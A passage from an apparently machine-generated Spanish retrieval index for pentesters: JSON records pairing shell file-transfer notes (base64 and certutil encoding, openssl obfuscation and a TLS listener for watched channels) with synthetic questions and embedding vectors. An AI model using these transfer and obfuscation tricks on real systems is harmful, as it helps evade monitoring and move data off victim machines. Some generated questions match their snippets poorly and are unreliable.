-0.04193]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Sin red: copy-paste por base64\n```bash\nbase64 -w0 f.bin # en origen, copias el string\necho \"BASE64...\" | base64 -d > f.bin # en destino, pegas", "indexar": "que programa puedo usar para convertir archivos a base64 sin necesidad de red?", "v": [0.08349, -0.02159, -0.17395, -0.12632, -0.02302, -0.11143, -0.03888, -0.13557, -0.01797, -0.12069, -0.0924, -0.04292, -0.05547, -0.08354, -0.04532, 0.00208, -0.01131, -0.07034, -0.04273, -0.088, -0.01705, -0.10327, -0.02498, -0.07665, 0.00663, 0.09622, -0.02595, -0.12561, -0.06004, -0.03493, 0.01505, -0.00467, -0.00205, -0.01791, -0.1268, -0.01212, -0.06563, 0.03349, -0.05954, 0.03609, 0.02206, 0.10898, -0.1481, 0.22959, -0.01725, -0.00456, 0.08685, -0.02441, 0.02591, -0.07034, -0.00714, -0.11248, -0.17438, -0.04446, -0.02475, -0.21987, 0.01445, -0.1126, -0.04321, 0.06907, -0.02799, 0.05467, 0.08813, 0.00611, 0.00331, -0.03991, 0.00641, 0.07723, -0.13358, 0.06153, -0.09441, 0.12485, -0.10884, 0.01557, 0.01517, 0.05618, 0.05614, -0.11031, 0.00058, 0.00778, -0.03279, 0.06127, 0.0135, 0.00505, -0.04714, -0.05864, 0.09363, -0.058, 0.04263, -0.07099, 0.12231, -0.00455, 0.03201, 0.00572, 0.08034, -0.06845, 0.05826, 0.02812, 0.01701, 0.02998, -0.01701, -0.07614, -0.01843, 0.02168, 0.07415, 0.04675, 0.14283, -0.06888, -0.0393, 0.03337, -0.0185, 0.05628, 0.02756, 0.01926, -0.00727, -0.0198, -0.03787, -0.00072, 0.0411, -0.08334, -0.0367, 0.05225, -0.04813, -0.0273, 0.11042, -0.02346, -0.01169, 0.06079, -0.07813, 0.05826, -0.03275, 0.00921, -0.0327, 0.01601, -0.12393, 0.06225, 0.03303, -0.05009, -0.03432, -0.0938, 0.0561, 0.03771, -0.07106, -0.01273, 0.12964, 0.12221, 0.09293, -0.07088, -0.1023, -0.05401, 0.02578, -0.00492, 0.00324, -0.00132, -0.05828, 0.01774, 0.07032, -0.04545, -0.03908, 0.01224, -0.0948, 0.01265, -0.0401, 0.00666, -0.01859, -0.08713, 0.04724, -0.0259, -0.00861, 0.04467, 0.03292, 0.09415, -0.02142, -0.05009, -0.03902, -0.03405, -0.08798, -0.06282, 0.02459, -0.0366, 0.00309, 0.00953, 0.06073, -0.00459, 0.01342, -0.04483, -0.04028, 0.01734, 0.00014, -0.02212, 0.00802, -0.0313, -0.06184, -0.01578, -0.06012, -0.0022, -0.01608, 0.02638, 0.02018, -0.1168, -0.03246, 0.02482, -0.07203, 0.01712, 0.0345, 0.01789, 0.02372, 0.01714, -0.02831, 0.12981, -0.01845, -0.05067, 0.02054, 0.00721, -0.0274, -0.01153, 0.04696, 0.00898, 0.04835, -0.00245, 0.09527, -0.01168, -0.02065, 0.00833, -0.01286, 0.02848, 0.00334, 0.01427, 0.03243, -0.01199, -0.0918, -0.00595, -0.06082, 0.00612, -0.01681, -0.05065, -0.03323, 0.04154, -0.03892, -0.07167, 0.04413, 0.0824, -0.07222, -0.03118, 0.01234, -0.01982, -0.09249, 0.04017, 0.03824, -0.03331, -0.01201, 0.10399, 0.07601, -0.0166, -0.00034, 0.051]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Sin red: copy-paste por base64\n```bash\nbase64 -w0 f.bin # en origen, copias el string\necho \"BASE64...\" | base64 -d > f.bin # en destino, pegas", "indexar": "con quΓ© herramienta transformo un archivo binario directamente a texto base64?", "v": [0.12121, -0.00866, -0.11701, -0.08845, -0.03323, -0.15833, -0.09746, -0.09854, -0.02538, -0.07642, -0.00624, -0.01799, -0.01676, -0.00418, 0.03476, 0.01307, 0.04371, -0.12333, -0.02295, -0.12074, -0.02105, -0.02435, -0.04343, -0.05043, -0.01885, -0.0714, -0.11116, -0.08865, -0.19143, 0.09025, 0.06513, 0.02295, 0.07026, 0.01129, -0.10539, -0.02775, -0.05119, 0.10308, -0.09264, 0.08494, 0.046, 0.0749, -0.14375, 0.25417, -0.13443, -0.07112, 0.0054, 0.04411, 0.04048, -0.02664, 0.0066, -0.16364, -0.15782, -0.03485, -0.07382, -0.20862, 0.15968, -0.14926, 0.05759, -0.00468, -0.02738, 0.04866, 0.0678, -0.02926, -0.06029, -0.02756, 0.01902, 0.04903, -0.12309, 0.07826, -0.10975, 0.15024, -0.03252, 0.0683, -0.01625, 0.06107, 0.03286, -0.03383, 0.00499, 0.05716, 0.00604, 0.02115, -0.01673, 0.03416, -0.06625, -0.02492, 0.02571, -0.00293, 0.01649, -0.07148, 0.09618, -0.00893, -0.02626, 0.02777, 0.01101, -0.04408, -0.02706, -0.03288, -0.00043, 0.04807, 0.02783, -0.06927, -0.02534, -0.00503, 0.09148, 0.04772, 0.03488, -0.02598, -0.11062, 0.02305, 0.02893, 0.08568, 0.09789, 0.03547, 0.08841, -0.01062, -0.05935, 0.04722, 0.06101, -0.09395, -0.06861, 0.09634, -0.02942, -0.01653, 0.05239, -0.04166, -0.0061, 0.04825, -0.05131, -0.00495, -0.02125, 0.00129, -0.08456, 0.01459, -0.06273, 0.07583, 0.07472, -0.07979, -0.03478, -0.07583, 0.07698, 0.03667, -0.06016, -0.02072, 0.09205, 0.06957, 0.08752, -0.05178, -0.06148, -0.05714, 0.02634, -0.02339, 0.0523, -0.01525, -0.07392, 0.01513, 0.03045, -0.03203, -0.05743, 0.00388, -0.08084, -0.01304, -0.01893, -0.00223, -0.01566, -0.0645, 0.01767, -0.04923, -0.05206, -0.03189, 0.02037, 0.04565, 0.01438, -0.03623, -0.03668, -0.06205, -0.11345, 0.03302, -0.00644, -0.01416, -0.01618, -0.0188, 0.09132, 0.01998, 0.01562, -0.04851, -0.00294, -0.02816, -0.012, 0.01363, 0.02343, -0.01897, -0.06975, -0.02773, -0.03844, -0.00162, -0.04281, 0.00079, 0.00408, -0.0536, -0.02977, -0.00371, -0.02194, 0.01878, 0.01474, 0.00322, -0.00016, -0.05498, -0.07972, 0.09561, -0.02809, -0.03023, 0.02556, -0.01203, -0.02496, 0.03076, 0.04156, -0.00558, 0.0309, -0.0193, 0.05911, -0.01034, 0.03682, -0.02923, -0.0079, 0.06468, 0.00118, 0.05477, -0.00227, -0.02312, -0.05231, -0.01003, -0.07553, 0.03131, 0.03215, -0.05718, -0.02322, 0.03634, -0.051, -0.06748, 0.06846, 0.0548, -0.04624, -0.04577, -0.01423, -0.01334, -0.06823, 0.03249, -0.00736, -0.06653, -0.04025, 0.01679, 0.08215, -0.03719, -0.02485, -0.03444]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Sin red: copy-paste por base64\n```bash\nbase64 -w0 f.bin # en origen, copias el string\necho \"BASE64...\" | base64 -d > f.bin # en destino, pegas", "indexar": "cual es una alternativa gratuita a los comandos de base64 para copiar y pegar datos?", "v": [0.12817, 0.07119, -0.13175, -0.06552, -0.04514, -0.18332, 0.07335, -0.05509, -0.11123, -0.05838, -0.01212, -0.07102, -0.01507, -0.05147, -0.00157, 0.01468, 0.07492, -0.05428, -0.04743, -0.08371, 0.00097, -0.05164, -0.00302, -0.09615, -0.07488, 0.02082, -0.02663, -0.07532, -0.13283, 0.01815, 0.07327, -0.02309, -0.03712, -0.00564, -0.16064, 0.00981, -0.04717, 0.02046, -0.00353, -0.03213, 0.03414, 0.06261, -0.23275, 0.18306, -0.07027, -0.06218, -0.02125, 0.07206, 0.09212, -0.09778, 0.00412, -0.08931, -0.14252, -0.07011, -0.11704, -0.13819, 0.1797, -0.07058, 0.02687, 0.07248, -0.06037, 0.04006, 0.05683, 0.07186, 0.04065, -0.03998, 0.00424, -0.03694, -0.10615, 0.07235, -0.04224, 0.18848, -0.11581, -0.01429, 0.03388, 0.02118, 0.01712, -0.06463, 0.02008, 0.10282, -0.05773, -0.00118, -0.022, 0.03912, -0.06771, -0.06017, 0.0231, -0.05182, -0.03623, -0.03224, 0.17444, 0.03374, 0.00627, 0.0819, -0.01959, -0.05014, 0.01641, 0.0201, 0.02258, 0.06397, -0.01145, -0.03851, -0.08122, 0.04548, 0.05864, 0.0152, 0.08375, -0.04896, -0.09332, 0.01497, -0.07897, 0.03058, 0.00421, 0.03901, 0.02331, -0.13005, -0.05249, 0.02617, 0.05392, -0.02692, -0.06105, 0.05422, -0.01493, -0.01488, 0.02259, -0.00132, 0.01828, 0.04154, -0.03457, 0.00973, -0.00893, 0.0044, 0.01465, 0.02423, -0.05531, 0.11811, -0.00853, -0.05434, -0.04617, -0.15744, 0.05467, 0.05779, -0.05697, 0.00326, 0.1004, 0.03561, 0.12079, -0.00463, -0.11628, -0.06541, 0.0047, 0.04262, 0.00605, 0.0463, -0.05435, 0.02388, 0.01255, -0.02802, -0.04369, 0.05652, -0.02267, -0.00093, -0.03349, 0.03713, -0.04721, -0.07913, 0.03857, -0.08377, -0.02013, 0.03572, -0.00188, 0.09811, -0.01736, -0.08347, 0.00065, -0.07892, -0.04256, -0.05785, 0.00354, -0.01969, 0.03157, 0.04026, 0.01692, -0.00619, 0.00828, -0.05593, -0.03976, 0.0314, -0.02093, -0.00874, 0.05243, 0.02593, -0.06232, -0.04221, -0.06136, -0.05912, 0.0223, -0.00434, -0.01635, -0.04516, -0.05896, 0.04708, -0.08501, -0.03269, 0.00532, -0.03175, 0.04961, 0.0349, -0.04773, 0.06119, -0.03086, -0.00551, 0.03936, -0.01627, -0.04493, -0.01904, 0.06602, -0.03332, 0.0034, -0.06596, 0.03598, 0.02852, 0.04273, -0.02051, -0.01435, 0.05988, 0.04162, 0.04695, 0.03013, -0.01759, -0.0629, 0.03963, -0.04463, 0.00619, 0.03681, -0.02705, -0.0386, 0.05399, -0.03279, -0.06417, 0.0676, 0.06131, -0.06132, -0.06259, 0.00222, -0.05134, -0.10834, 0.05077, -3e-05, -0.06605, -0.01516, 0.06292, 0.05613, -0.01484, -0.03711, -0.01457]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Windows: certutil -encode f.bin b64.txt / certutil -decode b64.txt f.bin\n```\nÚtil cuando solo tienes una shell de texto (Estabilizar shell TTY) o vΓ­a RDP `/clipboard`.", "indexar": "quΓ© programa puedo usar para codificar y decodificar archivos desde la terminal si no tengo acceso a un editor grΓ‘fico?", "v": [-0.16754, -0.03518, -0.1235, -0.17768, 0.07464, -0.11321, 0.03014, 0.0318, -0.10172, -0.00061, -0.14352, -0.13224, -0.15965, -0.10162, 0.04793, -0.07923, 0.12036, -0.16013, 0.16548, -0.00889, 0.02254, -0.00481, -0.06089, -0.05938, 0.09002, 0.00545, 0.03809, -0.05044, -0.08896, -0.10151, 0.03773, -0.06301, 0.19679, -0.02945, -0.13821, -0.01249, 0.10757, -0.01667, -0.04137, 0.11603, -0.01627, -0.02724, -0.08091, -0.00926, 0.08615, -0.09986, 0.0861, -0.01575, 0.05817, -0.02627, 0.05185, -0.03595, -0.05999, 0.10569, -0.06514, -0.00398, 0.02778, -0.09661, 0.02995, 0.01984, 0.04568, 0.07813, 0.00776, 0.05145, 0.01864, -0.0085, 0.03362, 0.03361, -0.13317, 0.10964, -0.0298, 0.02406, 0.00686, -0.01779, 0.04288, 0.05939, -0.13553, -0.13123, 0.10792, 0.01924, -0.01249, 0.03571, -0.02914, 0.02225, -0.08658, -0.11549, -0.02, 0.03432, -0.0866, 0.01345, 0.01312, -0.03266, -0.03097, -0.00052, 0.01151, 0.00637, -0.00099, 0.01008, 0.00995, 0.00913, 0.07597, -0.04169, -0.02551, 0.11106, 0.08742, 0.01195, 0.02808, 0.03173, -0.03093, 0.00232, 0.0828, 0.00627, -0.00288, 0.03969, -0.137, 0.00945, 0.03339, -0.04729, 0.00961, -0.12892, -0.04111, 0.04791, 0.0107, 0.03886, 0.06525, 0.04481, 0.05484, 0.14771, -0.06166, 0.07661, -0.02804, -0.0304, -0.02164, -0.04293, -0.14969, -0.06128, 0.04514, -0.06555, -0.0052, -0.00501, -0.01358, 0.07282, -0.02903, 0.04918, 0.08738, 0.0715, -0.07619, -0.04092, -0.09064, -0.08838, 0.01891, -0.04887, -0.06777, -0.04005, -0.02865, 0.0065, 0.08211, -0.03276, -0.06198, -0.01609, -0.12085, -0.00298, -0.05505, 0.05012, -0.01515, -0.05121, -0.00566, -0.05931, 0.0416, 0.001, 0.02798, 0.08215, 0.03454, -0.02107, 0.07254, -0.01089, -0.0739, -0.03422, -0.07289, -0.02174, -0.07579, 0.01652, 0.04566, 0.02167, -0.00783, -0.00248, 0.06192, 0.04662, 0.03153, 0.04975, -0.0067, 0.01794, 0.00303, 0.01116, 0.01753, -0.02797, 0.02111, -0.00097, -0.05049, -0.07464, 0.00987, 0.04527, 0.05325, 0.01856, 0.10735, 0.05352, -0.05958, -0.01609, 0.05925, 0.08861, 0.03909, 0.0116, 0.04534, 0.02322, 0.02846, -0.0002, -0.01843, 0.0807, 0.04706, 0.02423, 0.04143, -0.00913, -0.00556, 0.04466, 0.01329, -0.08224, -0.00924, 0.03138, 0.0227, 0.02371, -0.01645, 0.03067, -0.0427, 0.04074, -0.01414, -0.00049, 0.01703, -0.01594, -0.02504, -0.08158, 0.00168, 0.1025, 0.00143, 0.02212, -0.01189, -0.01772, -0.03042, -0.04761, -0.02829, 0.00491, -0.00667, -0.01121, 0.02935, -0.03218, 0.01425, 0.06577]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Windows: certutil -encode f.bin b64.txt / certutil -decode b64.txt f.bin\n```\nÚtil cuando solo tienes una shell de texto (Estabilizar shell TTY) o vΓ­a RDP `/clipboard`.", "indexar": "cΓ³mo convertir un archivo binario a base64 usando solo una consola de texto?", "v": [0.09545, -0.03233, -0.15565, -0.03352, -0.09012, -0.2166, -0.06255, -0.18551, -0.03723, -0.10468, -0.07222, -0.01749, -0.02457, 0.00035, -0.01579, -0.09499, 0.06165, -0.08689, -0.01318, -0.1084, 0.02508, -0.05334, 0.00625, -0.06295, 0.05243, -0.03071, -0.07827, -0.08749, -0.10113, 0.00127, 0.01439, -0.05488, 0.10085, 0.02409, -0.10306, -0.02057, -0.07191, 0.05922, -0.08363, 0.03489, 0.07905, 0.08621, -0.16893, 0.23128, -0.09657, -0.08292, 0.04168, 0.01703, 0.02866, -0.07189, 0.02986, -0.08419, -0.11574, -0.0133, -0.04048, -0.19634, 0.13343, -0.1182, 0.07204, 0.05264, -0.00523, 0.02788, 0.11597, 0.04068, -0.04322, -0.00378, -0.03616, 0.07052, -0.14605, 0.04748, -0.1542, 0.14702, -0.05089, 0.0464, 0.01401, 0.06962, -0.00732, -0.08318, 0.04362, 0.02486, -0.00252, -0.04441, -0.03365, 0.03418, -0.03407, -0.01032, 0.03497, -0.02229, 0.02489, -0.08895, 0.12391, -0.0518, -0.03307, 0.03707, 0.04219, -0.0731, 0.01037, -0.00266, 0.02088, 0.04663, 0.01494, -0.0361, -0.04129, 0.01076, 0.07591, 0.04895, 0.06842, -0.07537, -0.06633, -0.01319, -0.01756, 0.11717, 0.03212, 0.03889, 0.04865, -0.02863, -0.07091, 0.02917, 0.09077, -0.04529, -0.06154, 0.06542, -0.0119, -0.02275, 0.05033, -0.05927, -0.02061, 0.03524, -0.03772, 0.03629, -0.03323, -0.01479, -0.07034, 0.0099, -0.04162, 0.11743, 0.06781, -0.0377, -0.06282, -0.08251, 0.08199, 0.08125, -0.06135, -0.01434, 0.12576, 0.10138, 0.10852, -0.03965, -0.07162, -0.06332, 0.04082, -0.00952, 0.0427, -0.02862, -0.04945, 0.02047, 0.06283, -0.04385, -0.05776, -0.00065, -0.04388, 0.03805, -0.06227, 0.00709, -0.03185, -0.03507, -0.03511, -0.05299, -0.03206, -0.05291, 0.00459, 0.03485, -0.00108, -0.03935, -0.00783, -0.05419, -0.11112, 0.03038, -0.0171, 0.00241, -0.00289, -0.0056, 0.08092, -0.00197, -0.02048, -0.02785, -0.0152, -0.04477, 0.00595, -0.02441, 0.04779, -0.01198, -0.0925, -0.02675, -0.0203, -0.00768, -0.05278, 0.00577, -0.02518, -0.07368, 0.01356, 0.02425, -0.02955, -0.00016, 0.02284, -0.0278, -0.01741, -0.05459, -0.0662, 0.07639, 0.0019, 0.0058, 0.02533, 0.01804, -0.02478, 0.01517, 0.04999, -0.01421, 0.02586, -0.03261, 0.04957, 0.00059, 0.02509, -0.04484, -0.0179, 0.0561, 0.01232, 0.05285, -0.00595, -0.02328, -0.05732, 0.03448, -0.05989, 0.03659, 0.03271, -0.0277, -0.01933, 0.03026, -0.04318, -0.07063, 0.06921, 0.03571, -0.06412, -0.03668, -0.01166, -0.04813, -0.09469, 0.04298, 0.01979, -0.05202, -0.02907, 0.00046, 0.08634, -0.0129, -0.03752, -0.01303]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Cifrado (canal vigilado)\n```bash\nopenssl enc -base64 -in f -out f.b64 # ofuscar\nopenssl s_server -quiet -accept 7788 -cert c.pem -key k.pem < f # transferencia TLS\n```\n\nRelacionado: Egress filtering Β· Tunneling Β· Herramientas (Γ­ndice) Β· OSCP MOC", "indexar": "con quΓ© puedo cifrar un archivo de forma rΓ‘pida", "v": [-0.0086, 0.07936, -0.03419, -0.034, 0.02091, -0.05041, 0.05216, 0.00208, -0.11631, -0.09907, -0.01183, -0.10264, 0.0548, -0.01899, 0.10629, -0.08208, 0.07484, -0.06144, 0.08029, -0.02476, 0.11162, -0.05545, -0.02446, -0.092, -0.06003, -0.15471, 0.04973, 0.16916, -0.20887, 0.00163, 0.03859, 0.07073, 0.1291, 0.08332, -0.00537, 0.16807, 0.09278, 0.08177, -0.14613, 0.03979, 0.02052, 0.03637, -0.05058, 0.00592, -0.00038, -0.04227, -0.09427, 0.09477, 0.05549, -0.04146, 0.05932, -0.0996, -0.03275, -0.0255, -0.16496, -0.10841, 0.02469, -0.12546, 0.03026, 0.02447, 0.00884, 0.0976, -0.07703, 0.01689, -0.02642, -0.0256, -0.05378, -0.00944, -0.12682, -0.07631, -0.08278, 0.15195, -0.05117, 0.03072, -0.00826, 0.01075, -0.17357, -0.12317, -0.06633, 0.03618, 0.01959, -0.07318, 0.01086, -0.0784, -0.09059, 0.02422, -0.06948, 0.05053, 0.05358, -0.09215, 0.07237, 0.03497, -0.01043, 0.04947, -0.03872, -0.02727, 0.00046, 0.11378, -0.03507, -0.01654, -0.0412, 0.05744, -0.11275, 0.10633, 0.09904, 0.07683, -0.06705, 0.03578, -0.05881, 0.02708, 0.03277, 0.02906, 0.06929, 0.03315, -0.07586, -0.04882, 0.01577, -0.01827, 0.00381, -0.00863, 0.02225, -0.00838, 0.03707, 0.04175, -0.02769, -0.05419, -0.05221, 0.06228, -0.01066, -0.04747, -0.03496, 0.01101, -0.05843, -0.06548, 0.02568, -0.01255, -0.01216, 0.01106, 0.0467, -0.03901, 0.13342, -0.00727, -0.05738, -0.01074, 0.03592, -0.07144, 0.03896, -0.04125, -0.10602, -0.07899, 0.04038, 0.00936, 0.03316, -0.00479, -0.07666, 0.00875, 0.0464, -0.13914, -0.01742, -0.00397, 0.03713, 0.05749, -0.03797, 0.04343, -0.03749, -0.09106, 0.00514, -0.04947, 0.04145, -0.04108, -0.02472, -0.03421, -0.05368, -0.09518, 0.02074, -0.01684, -0.10067, -0.0576, 0.02761, -0.09312, -0.00623, 0.02928, -0.0103, 0.0299, -0.04021, -0.05752, 0.08203, -0.03545, -0.02507, 0.0872, 0.02295, 0.09513, -0.03473, -0.0223, -0.01812, -0.04597, -0.05804, 0.06818, 0.01745, -0.01619, -0.0437, -0.08432, -0.01251, 0.00841, 0.0263, -0.01499, -0.10867, -0.00139, -0.02616, -0.02407, 0.04278, -0.0007, 0.07621, -0.0611, -0.00556, 0.01596, 0.01227, 0.00363, 0.05211, -0.02884, 0.00574, 0.06122, 0.05457, -0.03011, 0.04186, 0.00595, 0.02609, 0.04207, -0.02565, 0.02541, -0.00752, 0.06072, 0.01748, -0.0114, 0.07969, -0.0293, -0.01748, -0.04798, -0.07215, 0.00778, 0.04706, 0.08042, -0.03705, 0.04939, -0.00466, 0.01488, -0.06333, 0.06115, 0.01634, -0.08342, -0.07752, -0.00013, 0.05508, 0.00249, 0.04071, -0.03543]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Cifrado (canal vigilado)\n```bash\nopenssl enc -base64 -in f -out f.b64 # ofuscar\nopenssl s_server -quiet -accept 7788 -cert c.pem -key k.pem < f # transferencia TLS\n```\n\nRelacionado: Egress filtering Β· Tunneling Β· Herramientas (Γ­ndice) Β· OSCP MOC", "indexar": "ΒΏhay alguna herramienta para crear una conexiΓ³n segura tipo tΓΊnel?", "v": [-0.06984, 0.0312, -0.18953, -0.12545, 0.04187, -0.08888, -0.20513, 0.01844, 0.07089, -0.02223, -0.14377, 0.0034, 0.0918, 0.06342, -0.03938, 0.05841, -0.03187, -0.13164, 0.16798, 0.01072, -0.0741, -0.01083, -0.11656, -0.04557, -0.04456, -0.12341, 0.03606, -0.0525, -0.14414, -0.09183, 0.07027, 0.02759, 0.13436, 0.04582, -0.09901, -0.02909, 0.00676, 0.14164, 0.03893, 0.01116, -0.07126, -0.03992, -0.06832, 0.11852, 0.04208, 0.01915, -0.0236, -0.07487, 0.03518, -0.0032, -0.01896, -0.0917, -0.20581, -0.10566, 0.05856, -0.11673, 0.15221, -0.07771, 0.04319, -0.10794, -0.06399, -0.03841, -0.02026, 0.036, -0.00018, -0.06239, 0.05773, -0.09564, -0.06223, 0.03931, -0.08077, -0.10473, -0.01082, 0.13867, 0.02414, 0.00942, 0.02438, 0.03551, 0.05047, 0.12542, 0.02636, 0.06384, 0.02899, -0.02307, -0.10012, -0.01799, -0.01359, 0.01687, 0.03825, -0.05103, -0.07623, 0.0151, 0.03995, 0.09378, 0.02096, -0.02978, -0.00097, -0.06666, -0.06535, -0.0286, 0.06507, -0.06418, -0.0254, 0.15321, -0.02814, 0.00222, -0.01853, -0.04624, 0.01412, 0.00798, 0.06875, 0.16275, 0.04571, -0.05619, -0.04308, 0.06011, 0.00254, 0.03261, -0.00796, -0.12326, 0.04704, 0.0145, -0.07864, -0.04333, -0.02095, -0.01272, -0.03402, 0.09837, -0.00721, 0.01961, -0.05778, 0.00652, -0.07429, -0.06988, 0.02354, 0.03173, 0.00957, -0.08924, 0.02749, -0.04447, 0.01336, -0.01266, -0.05859, -0.12387, -0.0248, -0.01033, -0.05782, -0.11438, -0.02711, 0.02443, -0.0267, -0.03766, -0.02542, -0.03142, -0.00175, 0.01072, 0.01509, 0.00465, -0.04324, 0.115, 0.03872, 0.02247, 0.04203, -0.06642, -0.00377, -0.04898, -0.03091, -0.01139, 0.03761, 0.00225, -0.00597, 0.01764, 0.0554, -0.01193, 0.02603, -0.06336, -0.05477, -0.03867, 0.0076, -0.05834, 0.01376, -0.1148, -0.02456, 0.06358, 0.03418, -0.11524, 0.07631, -0.02749, 0.0215, 0.08145, -0.03146, -0.03442, -0.01926, -0.04196, -0.00061, -0.05271, 0.06898, -0.08907, 0.05392, -0.00681, -0.04724, -0.05532, 0.07961, -0.04703, 0.00326, 0.01067, -0.03843, -0.05208, 0.03314, 0.06587, 0.10682, -0.0229, 0.00504, -0.04218, 0.03992, 0.01965, 0.01338, 0.04584, -0.02596, 0.01078, 0.04005, -0.02261, -0.01645, 0.03594, -0.00362, 0.00798, -0.01281, 0.01032, -0.08213, -0.02442, 0.03726, -0.03946, -0.04601, -0.01666, 0.04843, -0.04653, 0.01135, -0.01591, 0.00346, -0.01304, 0.01007, 0.04408, 0.03434, 0.03033, -0.04089, 0.00702, 0.00341, 0.0128, -0.0659, -0.05712, -2e-05, -0.01636, 0.0242, 0.01175, 0.03859, -0.00685]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Cifrado (canal vigilado)\n```bash\nopenssl enc -base64 -in f -out f.b64 # ofuscar\nopenssl s_server -quiet -accept 7788 -cert c.pem -key k.pem < f # transferencia TLS\n```\n\nRelacionado: Egress filtering Β· Tunneling Β· Herramientas (Γ­ndice) Β· OSCP MOC", "indexar": "cual programa sirve para ofuscar datos antes de enviarlos", "v": [-0.10889, 0.00084, -0.03901, -0.07553, 0.04887, -0.2113, 0.03821, -0.08759, -0.14116, -0.01448, -0.10957, -0.24789, 0.02336, -0.09059, -0.07362, -0.01855, 0.15107, -0.0815, 0.1042, -0.00476, -0.01119, -0.00676, -0.08106, -0.16608, -0.17744, 0.05689, -0.00211, -0.05206, -0.09747, 0.06426, 0.06602, -0.05439, -0.03463, -0.07834, 0.01615, 0.06233, 0.02966, 0.11334, -0.04817, 0.05591, 0.07809, 0.01646, -0.02524, 0.02906, 0.05086, -0.06778, 0.0179, 0.05121, -0.00998, -0.11756, 0.05715, 0.05092, 0.0148, -0.04441, -0.0502, -0.0431, 0.00829, -0.15486, -0.05419, 0.09924, 0.06869, 0.07394, 0.02226, -0.00167, 0.04737, -0.10885, 0.08362, 0.00494, -0.11876, 0.03059, 0.02725, 0.1131, 0.04255, -0.05572, -0.01741, -0.03734, -0.03656, 0.0895, -0.01793, -0.01237, -0.01853, 0.00412, -0.02973, 0.15059, -0.00651, 0.00828, 0.08115, 0.0108, -0.04541, -0.06488, 0.06484, 0.13393, 0.00647, 0.13851, 0.13573, 0.04003, 0.07222, 0.04682, -0.02525, 0.08078, 0.03789, -0.04565, -0.09766, 0.12587, -0.04972, 0.0854, 0.05023, 0.00215, -0.05036, 0.02302, -0.02943, -0.05625, -0.03261, 0.01969, -0.04776, -0.0474, -0.02243, -0.01889, 0.07674, 0.00962, -0.0912, 0.01142, -0.00164, 0.0254, 0.05373, 0.01112, -0.00147, 0.05099, -0.01545, 0.16113, 0.03153, -0.00128, -0.03866, -0.03569, 0.02839, -0.05096, -0.06759, -0.0273, 0.06936, -0.0636, 0.05533, 0.10068, 0.00712, 0.04677, 0.00367, -0.00778, -0.01037, 0.02513, 0.02862, -0.07165, 0.02634, 0.07724, 0.00793, 0.05959, -0.0822, -0.03693, 0.04741, -0.05635, -0.0313, -0.02873, -0.02948, 0.0323, 0.00207, 0.04061, 0.03107, -0.11098, 0.00504, -0.00601, 0.0791, 0.0925, 0.02178, 0.02936, 0.04602, -0.09452, 0.0091, -0.02533, -0.05615, -0.10717, -0.03898, -0.04506, -0.00977, 0.03661, 0.04043, 0.02692, 0.01143, -0.03622, -0.02441, 0.00412, 0.01519, -0.00189, -0.0283, 0.046, 0.06902, -0.03981, 0.03459, -0.0516, -0.06483, 0.0097, 0.04834, -0.04286, -0.04999, 0.02016, -0.0567, 0.01139, 0.02641, 0.11319, -0.00122, -0.05172, 0.06444, 0.03328, -0.00825, -0.03493, 0.0884, 0.03767, -0.0481, -0.05826, 0.04337, 0.01751, 0.04229, 0.08219, -0.05453, -0.02068, 0.0246, 0.0368, -0.02391, -0.0244, 0.09596, 0.00929, 0.02379, -0.02295, -0.02686, -0.02179, 0.013, -0.02817, 0.0786, -0.01872, 0.00705, -0.0391, 0.00743, -0.11813, 0.01268, 0.05105, -0.02954, -0.0456, 0.01902, 0.01129, -0.08587, 0.03485, 0.01629, -2e-05, -0.04465, -0.02403, 0.0049, -0.06723, 0.04268, 0.01642]} -{"tipo": "pregunta", "herramienta": "Puesto de mando Kali", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Puesto de mando Kali.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Puesto de mando Kali\n\n> **No tienes una GUI central.** Cada herramienta es independiente y habla por red con la vΓ­ctima.\n> Tu Kali = un puesto de mando con varios terminales abiertos a la vez.", "indexar": "con que puedo montar un entorno de pruebas como Kali Linux pero sin interfaz grΓ‘fica?", "v": [-0.08655, 0.08311, -0.18168, -0.1755, -0.06746, -0.12521, -0.09922, 0.14346, -0.07552, -0.06062, 0.09097, -0.03732, -0.02113, -0.05328, 0.10827, 0.04852, -0.03301, -0.14515, -0.04396, -0.12967, -0.07781, 0.03381, -0.1055, -0.11461, 0.06196, 0.04516, 0.04773, -0.15178, 0.02005, -0.04967, -0.08888, 0.0991, 0.10151, 0.00249, -0.12573, -0.0444, 0.00277, 0.01211, 0.18408, -0.00733, 0.08937, -0.01728, -0.00839, 0.06335, -0.00984, -0.13018, -0.00547, -0.02113, 0.02858, -0.11358, 0.08074, -0.09051, -0.0608, 0.00536, 0.00274, -0.11324, 0.14259, -0.13021, 0.12367, 0.00211, -0.06224, 0.06866, -0.01547, -0.00069, 0.09072, 0.01267, -0.07288, 0.02261, -0.07424, -0.00831, 0.0323, 0.08506, -0.05275, -0.08217, -0.02974, 